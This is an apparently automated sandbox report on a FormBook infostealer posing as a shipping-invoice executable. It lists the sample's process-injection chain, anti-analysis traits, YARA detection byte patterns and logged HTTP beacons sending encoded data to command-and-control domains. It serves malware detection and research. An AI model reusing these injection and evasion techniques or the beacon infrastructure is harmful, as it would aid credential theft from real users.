Analysis Report Shipping INVOICE-BL Shipment..exe

Overview

General Information

Sample Name: Shipping INVOICE-BL Shipment..exe
Analysis ID: 323227
MD5: 579ba39b6a146080ef6481591440e445
SHA1: 06bfc3b47e1ad6a35e10cb4a1edee6c563710107
SHA256: d8d9bb65ea3637fda09488baada0c9b387e0619b7c430b93c8a0fa2d8b489bc1
Tags: Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Executable has a suspicious name (potential lure to open the executable)
Hijacks the control flow in another process
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Shipping INVOICE-BL Shipment..exe (PID: 2792 cmdline: 'C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe' MD5: 579BA39B6A146080EF6481591440E445)
    • rundll32.exe (PID: 1748 cmdline: rundll32.exe Prehnite,Lychnises MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 6360 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • netsh.exe (PID: 4768 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • cmd.exe (PID: 6908 cmdline: /c del 'C:\Windows\SysWOW64\cmd.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x16679:$sqlite3step: 68 34 1C 7B E1
  • 0x1678c:$sqlite3step: 68 34 1C 7B E1
  • 0x166a8:$sqlite3text: 68 38 2A 90 C5
  • 0x167cd:$sqlite3text: 68 38 2A 90 C5
  • 0x166bb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author
2.2.cmd.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.cmd.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x77c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13855:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13341:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13957:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13acf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x856a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x92e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18947:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x199ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.cmd.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x15879:$sqlite3step: 68 34 1C 7B E1
  • 0x1598c:$sqlite3step: 68 34 1C 7B E1
  • 0x158a8:$sqlite3text: 68 38 2A 90 C5
  • 0x159cd:$sqlite3text: 68 38 2A 90 C5
  • 0x158bb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x159e3:$sqlite3blob: 68 53 D8 7F 8C
2.2.cmd.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.cmd.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Prehnite.dll | ReversingLabs: Detection: 27%
Multi AV Scanner detection for submitted file
Source: Shipping INVOICE-BL Shipment..exe | Virustotal: Detection: 27%
Source: Shipping INVOICE-BL Shipment..exe | ReversingLabs: Detection: 44%
Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 2.2.cmd.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe | Code function: 0_2_00406469 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe | Code function: 0_2_00402765 FindFirstFileA,
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe | Code function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4x nop then pop esi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49766
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49767
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 75.126.100.11:80 -> 192.168.2.4:49769
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49771
Source: global traffic | HTTP traffic detected: GET /mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1 | Host: www.carnesveymacr.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS HTTP/1.1 | Host: www.mehler.photography | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG HTTP/1.1 | Host: www.thelonerangernews.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1 | Host: www.hvcharging.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176 HTTP/1.1 | Host: www.jddq888.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1 | Host: www.wtmailer15.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly HTTP/1.1 | Host: www.wastie.club | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1 | Host: www.gettingthehelloutofca.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a HTTP/1.1 | Host: www.caelaabadie.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 192.0.78.24
Source: Joe Sandbox View | IP Address: 34.102.136.180
Source: Joe Sandbox View | ASN Name: AUTOMATTICUS
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: unknown | DNS traffic detected: queries for: www.carnesveymacr.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 26 Nov 2020 14:09:00 GMT | Server: Apache/2.4.6 (CentOS) PHP/7.3.19 | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 71 67 66 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /mqgf/ was not found on this server.</p></body></html>
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Shipping INVOICE-BL Shipment..exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Shipping INVOICE-BL Shipment..exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: nse53A7.tmp.0.dr | String found in binary or memory: http://openoffice.org/2001/block-list
Source: explorer.exe, 00000004.00000000.693351563.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: nse53A7.tmp.0.dr | String found in binary or memory: http://www.businessobjects.com0
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: nse53A7.tmp.0.dr | String found in binary or memory: http://www.freedesktop.org/standards/shared-mime-info
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe | Code function: 0_2_004053CB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Executable has a suspicious name (potential lure to open the executable)
Source: Shipping INVOICE-BL Shipment..exe | Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Shipping INVOICE-BL Shipment..exe
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_00418180 NtCreateFile,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_00418230 NtReadFile,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_004182B0 NtClose,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_0041817A NtCreateFile,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_004182DA NtClose,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_004182AC NtClose,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B795D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B796E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B797A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B799A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B795F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B7AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79560 NtWriteFile,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B796D0 NtCreateKey,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79660 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79650 NtQueryValueKey,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B7A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B7A770 NtOpenThread,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79760 NtOpenProcess,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B798A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B798F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B7B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B799D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79A10 NtQuerySection,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B7A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_04B79B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_008054E0 NtDelayExecution,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_0080318C NtWriteVirtualMemory,
